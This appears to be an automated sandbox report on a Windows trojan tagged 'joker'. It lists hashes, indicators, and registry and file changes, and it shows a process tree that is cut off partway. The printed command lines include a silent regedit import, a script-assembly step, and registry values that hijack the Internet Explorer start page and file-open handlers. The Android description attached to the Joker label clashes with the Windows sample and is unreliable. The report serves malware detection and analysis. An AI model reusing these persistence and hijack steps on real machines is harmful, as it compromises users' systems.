joker | 7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8

Analysis

max time kernel
126s
max time network
170s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
19-09-2022 08:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe
Size

31KB
MD5

d19fb816ef890f60e3540b406e7c3bf5
SHA1

6a359982daceb160e73334341e70d83e3796c421
SHA256

7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8
SHA512

c0ab0c0c8d1280e335576c38f86769b120e8368494f3369c1def895fbda7b29e26c59f90cd36d6c25a8070830c8debff9ffc18fece89a6eac614a9ac75ec8d69
SSDEEP

768:kocmTDD19oLGzXhvhLdXUi6ZBasRoxUMg:vPz5h9xRuBb2xUMg

Score

10^/10

joker infostealer trojan upx

Malware Config

Signatures

joker
Joker is an Android malware that targets billing and SMS fraud.
infostealer trojan joker

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1960-60-0x0000000000400000-0x0000000000429000-memory.dmp	upx
behavioral1/memory/1960-61-0x0000000000400000-0x0000000000429000-memory.dmp	upx
behavioral1/memory/1960-75-0x0000000000400000-0x0000000000429000-memory.dmp	upx

Deletes itself 1 IoCs

pid	Process
1104	wscript.exe

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Common Files\tk.reg	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File created	\??\c:\windows\1_dsckggyoa.bndub	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe
File opened for modification	\??\c:\windows\pack.wsf	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe
File opened for modification	\??\c:\windows\dsckggyoa.bndub	Cmd.exe
File opened for modification	C:\Windows\My.ini	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe
File opened for modification	\??\c:\windows\dsckggyoa.bndub	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\Total = "189"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DOMStorage\5136688.com\Total = "126"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\ = "567"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main	WScript.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\ = "315"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "630"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\Total = "630"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Factor = "20"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.5136688.com	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.5136688.com\ = "63"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "315"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\Total = "252"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\Start Page Redirect Cache = "c:\\about blank.htm"	WScript.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\Total = "315"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "567"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\Total = "567"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DOMStorage\5136688.com\NumberOfSubdomains = "1"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "252"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\ = "630"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Size = "10"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DOMStorage	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "63"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\ = "504"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\ = "189"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\ = "441"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\ = "693"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DOMStorage\huahua01.tv	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\ = "63"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\Total = "126"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\ = "252"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "441"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "370360764"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DOMStorage\5136688.com\Total = "63"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\Total = "693"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000062e6ef0d45f4454ab79548c962d74cdf000000000200000000001066000000010000200000004e9d2f8feadb67c723b52a1a1175bf4f1ccf8efb46d7d3775cf134bdce95c0ff000000000e8000000002000020000000cdc0a008a70907f4df519d95ca65350a7001a8cfe43c6d76e242eadbfbb55fa8900000005b52b9b4a6d518db5873ab9a47e9c198609acc47c16bbaa6f2979d3d781eb3445d9db48c2c27a940d1875f9c5853aaa77f37273778c85da0a7b8ebc2742f0fcf57599a49deb7c49620097cb77fafbe5a6a08554e4721d4c3ffccb06a9f1e55d098dadeec7c1e201e03e92613b4da236b465af237b268833104423eb8d71b4c2dfbfae5b6e17ada6a9e052be59744a82640000000d1bac4279daf3279fde86be6b171d87c93e8986574d06c9a455e26c8d518f2ea7264f7096ce4c7159923ea50496468d4a01cc718d8fe007a21f73bae174e8f22	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\Total = "378"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\Local Page = "c:\\about blank.htm"	WScript.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Enable = "1"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DOMStorage\5136688.com	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "126"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DOMStorage\huahua01.tv\NumberOfSubdomains = "1"	IEXPLORE.EXE

Modifies Internet Explorer start page 1 TTPs 1 IoCs

stealer

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\Start Page = "c:\\about blank.htm"	WScript.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\DefaultIcon\ = "C:\\Windows\\SysWow64\\WScript.exe,3"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shell\open	WScript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\Attributes = "1"	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000_CLASSES\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\????(&O)\Command\ = "\"C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE\" %1 h%t%t%p:%//%w%w%w.%15%11%13%16%16%18%18.%c%o%m/?8"	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\CLSID	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shellex\ContextMenuHandlers\	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\CLSID	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex\DropHandler\ = "{e96f0e95-227e-4cc1-8f1e-2b0c01b1f080}"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.Ink\ = "Inkfile"	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\ = "????"	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000_CLASSES\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\????(&O)	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\NeverShowExt	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shell	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shellex\IconHandler\ = "{FBF23B40-E3F0-101B-8488-00AA003E56F8}"	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000_CLASSES\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\DefaultIcon	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\open\command	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\ScriptEngine\ = "JScript"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\Edit\Command\ = "C:\\Windows\\SysWow64\\Notepad.exe %1"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\NeverShowExt	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\DefaultIcon\ = "%SystemRoot%\\SysWow64\\url.dll,0"	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shellex	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shell	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000_CLASSES\Wow6432Node\CLSID	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex\IconHandler	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Open2	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.Ink	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex\ContextMenuHandlers	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\CLSID\ = "{FBF23B40-E3F0-101B-8488-00AA003E56F8}"	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shellex\ContextMenuHandlers	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000_CLASSES\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ = "Internet Explorer"	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shellex	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shell\ = "open"	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\CLSID\ = "{e96f0e95-227e-4cc1-8f1e-2b0c01b1f080}"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\ShellEx	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shell\ = "open"	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shell\open\CLSID = "{FBF23B40-E3F0-101B-8488-00AA003E56F8}"	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ = "Internet Explorer"	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex\ContextMenuHandlers\	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Open	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shell\open\command\ = "WScript.exe \"c:\\windows\\dsckggyoa.bndub\" \"%1\""	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.qc	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shell\open\command	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shellex\IconHandler\ = "{FBF23B40-E3F0-101B-8488-00AA003E56F8}"	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000_CLASSES\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\ = "C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE"	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\ = "JScript Script File"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\open\command\ = "C:\\Windows\\SysWow64\\WScript.exe \"%1\" %*"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Open2\Command	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\ShellEx\PropertySheetHandlers	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000_CLASSES\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\LocalizedString = "Internet Explorer"	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Print	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\ = "C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE"	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000_CLASSES\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bndub	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\ = "open"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shellex\ContextMenuHandlers\	WScript.exe

Runs .reg file with regedit 1 IoCs

pid	Process
1244	regedit.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1864	iexplore.exe
1864	iexplore.exe

Suspicious use of SetWindowsHookEx 11 IoCs

pid	Process
1960	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe
1864	iexplore.exe
1864	iexplore.exe
1744	IEXPLORE.EXE
1744	IEXPLORE.EXE
1864	iexplore.exe
1864	iexplore.exe
1368	IEXPLORE.EXE
1368	IEXPLORE.EXE
1368	IEXPLORE.EXE
1368	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 40 IoCs

description	pid	Process	procid_target
PID 1960 wrote to memory of 1000	1960	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe	28
PID 1960 wrote to memory of 1000	1960	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe	28
PID 1960 wrote to memory of 1000	1960	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe	28
PID 1960 wrote to memory of 1000	1960	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe	28
PID 1000 wrote to memory of 1244	1000	cmd.exe	30
PID 1000 wrote to memory of 1244	1000	cmd.exe	30
PID 1000 wrote to memory of 1244	1000	cmd.exe	30
PID 1000 wrote to memory of 1244	1000	cmd.exe	30
PID 1960 wrote to memory of 2036	1960	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe	31
PID 1960 wrote to memory of 2036	1960	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe	31
PID 1960 wrote to memory of 2036	1960	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe	31
PID 1960 wrote to memory of 2036	1960	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe	31
PID 2036 wrote to memory of 952	2036	Cmd.exe	33
PID 2036 wrote to memory of 952	2036	Cmd.exe	33
PID 2036 wrote to memory of 952	2036	Cmd.exe	33
PID 2036 wrote to memory of 952	2036	Cmd.exe	33
PID 1960 wrote to memory of 2012	1960	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe	35
PID 1960 wrote to memory of 2012	1960	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe	35
PID 1960 wrote to memory of 2012	1960	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe	35
PID 1960 wrote to memory of 2012	1960	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe	35
PID 2012 wrote to memory of 1864	2012	WScript.exe	36
PID 2012 wrote to memory of 1864	2012	WScript.exe	36
PID 2012 wrote to memory of 1864	2012	WScript.exe	36
PID 2012 wrote to memory of 1864	2012	WScript.exe	36
PID 1864 wrote to memory of 1744	1864	iexplore.exe	40
PID 1864 wrote to memory of 1744	1864	iexplore.exe	40
PID 1864 wrote to memory of 1744	1864	iexplore.exe	40
PID 1864 wrote to memory of 1744	1864	iexplore.exe	40
PID 1960 wrote to memory of 1732	1960	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe	42
PID 1960 wrote to memory of 1732	1960	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe	42
PID 1960 wrote to memory of 1732	1960	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe	42
PID 1960 wrote to memory of 1732	1960	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe	42
PID 1864 wrote to memory of 1368	1864	iexplore.exe	44
PID 1864 wrote to memory of 1368	1864	iexplore.exe	44
PID 1864 wrote to memory of 1368	1864	iexplore.exe	44
PID 1864 wrote to memory of 1368	1864	iexplore.exe	44
PID 1960 wrote to memory of 1104	1960	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe	43
PID 1960 wrote to memory of 1104	1960	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe	43
PID 1960 wrote to memory of 1104	1960	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe	43
PID 1960 wrote to memory of 1104	1960	7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe	43

C:\Users\Admin\AppData\Local\Temp\7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe
"C:\Users\Admin\AppData\Local\Temp\7dfe16341f4c1db49c9a9f49fd0c76a44a76f7ca02f4962ffcad97a5dfe1d0d8.exe"
1⤵
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1960
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c regedit /s "C:\Program Files\Common Files\tk.reg"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1000
- - C:\Windows\SysWOW64\regedit.exe
    regedit /s "C:\Program Files\Common Files\tk.reg"
    3⤵
    - Modifies registry class
    - Runs .reg file with regedit
    PID:1244
- C:\Windows\SysWOW64\Cmd.exe
  Cmd.exe /c CScript /nologo "c:\windows\pack.wsf" "c:\windows\1_dsckggyoa.bndub" >> "c:\windows\dsckggyoa.bndub"
  2⤵
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:2036
- - C:\Windows\SysWOW64\cscript.exe
